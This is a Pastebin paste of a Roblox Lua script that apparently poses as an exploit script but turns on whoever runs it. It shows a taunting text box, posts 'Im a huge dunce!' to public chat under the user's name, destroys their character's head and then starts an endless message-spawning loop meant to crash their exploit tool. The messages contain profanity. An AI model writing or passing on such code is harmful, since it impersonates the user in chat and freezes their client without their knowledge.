Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- local ScreenGui = Instance.new("ScreenGui")
- local TextBox = Instance.new("TextBox")
- local ScreenGui = Instance.new("ScreenGui")
- local TextBox = Instance.new("TextBox")
- ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
- ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
- TextBox.Parent = ScreenGui
- TextBox.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
- TextBox.BorderColor3 = Color3.fromRGB(27, 42, 53)
- TextBox.Position = UDim2.new(0, 600, 0, 500)
- TextBox.Size = UDim2.new(0, 200, 0, 50)
- TextBox.ClearTextOnFocus = false
- TextBox.Font = Enum.Font.SciFi
- TextBox.Text = "lol youre kinda fucked"
- TextBox.TextColor3 = Color3.fromRGB(255, 255, 255)
- TextBox.TextSize = 14.000
- game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("Im a huge dunce!",
- "All")
- wait(5)
- game.Players.LocalPlayer.Character.Head:Destroy()
- wait(1)
- if game.Players.LocalPlayer.Character.Humanoid.Health == 0 then
- while true do
- spawn(function()
- local message = Instance.new("Message",workspace)
- message.Text = "If you're seeing this, im crashing your fucking exploit. :)"
- wait(5)
- message:Destroy()
- end)
- end
- end
Add Comment
Please, Sign In to add comment